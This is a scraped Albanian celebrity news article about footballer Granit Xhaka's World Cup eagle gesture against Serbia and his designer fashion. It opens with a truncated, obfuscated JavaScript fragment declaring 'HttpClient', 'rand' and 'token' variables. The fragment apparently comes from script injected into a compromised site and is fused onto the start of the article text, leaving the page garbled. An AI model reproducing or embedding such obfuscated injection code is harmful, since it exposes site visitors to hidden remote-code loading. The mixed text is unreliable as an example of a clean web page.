;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Granit Xhaka jo vetëm futbollist i zoti, ai është edhe një çun që e do modën dhe ky imazh e dëshmon

By

Granit Xhaka është emri që do të mbahet gjatë në mend nga shqiptarët, zemrat e të cilëve i gëzoi fort.

Futbollisti kosovar, që luan për Kombëtaren Zvicerane të Futbollit e po ashtu edhe për Arsenalin në Premier Ligë të Britanisë së Madhe, u dha flakë ndjenjave nacionaliste të shqiptarëve, kur bëri shqiponjën gjatë një ndeshjeje,

Dhe jo në një vend do si do, por mu në mes të Rusisë në një ndeshje që po luhej me Serbinë, që ende mbetet njëri ndër shtetet me të cilat Kosova nuk ka raporte normale.

Xhaka performoi me duar simbolin kombëtar shqiptar, pasi shënoi gol për Zvicrën kundër Serbisë, në Kampionatin Botëror të Futbollit që u mbajt në Qershor e Korrik të këtij viti.

Por pavarësisht zotësisë së tij në fushë, ai është edhe nëj djalë shumë modern.

Xhaka vishet firmato dhe të preferuarat i ka Gucci e Loius Vuitton, ndërsa në imazhin e fundit që ka publikuar në Instagram ku ai zakonisht është shumë aktiv, duket tejet fashion në një palë tuta sportive dhe atlete të markës Gucci. /Prive.al

Artikuj të ngjashëm